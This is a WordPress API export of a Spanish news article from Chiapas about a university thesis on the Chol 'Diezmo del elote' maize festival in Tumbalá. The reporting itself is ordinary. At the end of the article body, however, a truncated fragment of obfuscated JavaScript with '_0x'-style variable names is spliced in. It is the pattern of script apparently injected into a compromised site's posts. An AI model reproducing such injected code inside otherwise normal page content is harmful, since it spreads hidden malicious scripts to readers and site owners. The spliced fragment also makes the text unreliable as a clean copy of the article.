{"id":17972,"date":"2024-09-21T02:37:48","date_gmt":"2024-09-21T02:37:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17972"},"modified":"2024-09-21T02:37:49","modified_gmt":"2024-09-21T02:37:49","slug":"la-fiesta-del-diezmo-del-elote-debe-rescatarse-en-tumbala-egresada-unich","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17972","title":{"rendered":"La fiesta del Diezmo del elote debe rescatarse en Tumbal\u00e1: Egresada UNICH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"483\" height=\"393\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-20-at-2.41.43-PM.jpeg\" alt=\"\" class=\"wp-image-17973\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-20-at-2.41.43-PM.jpeg 483w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/WhatsApp-Image-2024-09-20-at-2.41.43-PM-300x244.jpeg 300w\" sizes=\"auto, (max-width: 483px) 100vw, 483px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>20 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- \u201cLa fiesta del Diezmo del elote: una manifestaci\u00f3n cultural entre los ind\u00edgenas Choles de Hidalgo Joshil, de Tumbal\u00e1, Chiapas, debe rescatarse, para que los j\u00f3venes de nuevas generaciones lo preserven\u201d, fue lo que consider\u00f3 Patricia Rodr\u00edguez Montejo, quien recibi\u00f3 el t\u00edtulo de Licenciada en Lengua y Cultura, al presentar su tesis profesional con este tema.<\/p>\n\n\n\n<p>La joven, explic\u00f3 que estas festividades consisten en ritos basados en la milpa y su relaci\u00f3n con el conocimiento local, esto tambi\u00e9n es conocido como promesa antes de hacer la milpa, \u201cen la cual se junta todos los productos se hace una cruz con los 3 colores de ma\u00edz, se le ora y se le danza, entregando como Diezmo Elote, Velas, Incienso, Licor, Tortillas, Flores, Mayordomo\u201d.<\/p>\n\n\n\n<p>Detall\u00f3 que estas actividades poseen una fuerza espiritual que es aprovechada desde el conocimiento local, ya que se presenta el elote en formas de tamal de elote \u201cchuybi waj\u201d, tortilla de ma\u00edz tierno \u201cxixi waj\u201d, atole \u201cul\u201d, el mismo elote en grano \u201cchux\u00e2l wuajtia\u00f1\u201d, pan \u201ctsejbil waj\u201d, y se hace un rezo, purificaci\u00f3n, especialmente al ma\u00edz, Dios, la naturaleza y sus deidades.<\/p>\n\n\n\n<p>El cultivo de la milpa ch\u00b4ol de Hidalgo Joshil se practica dos veces al a\u00f1o, ya que predomina el clima semic\u00e1lido h\u00famedo con lluvias todo el a\u00f1o, lo que favorece la pr\u00e1ctica de la agricultura. Por el tipo de suelo y el clima, se goza de una diversidad de plantas y fauna que abundan en ese entorno.<\/p>\n\n\n\n<p>Patricia Rodr\u00edguez, indic\u00f3 que los cultivadores agradecen a los montes a la tierra y a los Dioses guardianes del universo sus bondades para el trabajo y los alimentos que obtienen de la tierra, pero que se han ido perdiendo con las nuevas generaciones, y es de donde ella decide retomar este tema que se queda documentado en la biblioteca de la UNICH, para que pueda ser consultados, resultado de un trabajo de investigaci\u00f3n de m\u00e1s de 5 a\u00f1os, aproximadamente.<\/p>\n\n\n\n<p>\u201c La fiesta del Diezmo del elote significa alegr\u00eda, convivencia, unidad, cultura y representa la vida cotidiana del pueblo. Muchas de las pr\u00e1cticas milenarias se integraron a los festejos y las creencias de la iglesia cat\u00f3lica\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 20 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- \u201cLa fiesta del Diezmo del elote: una manifestaci\u00f3n cultural entre los ind\u00edgenas Choles de Hidalgo Joshil, de Tumbal\u00e1, Chiapas, debe rescatarse, para que los j\u00f3venes de nuevas generaciones lo preserven\u201d, fue lo que consider\u00f3 Patricia Rodr\u00edguez Montejo, quien recibi\u00f3 el t\u00edtulo de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17973,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17972","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17972"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17972\/revisions"}],"predecessor-version":[{"id":17974,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17972\/revisions\/17974"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17973"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}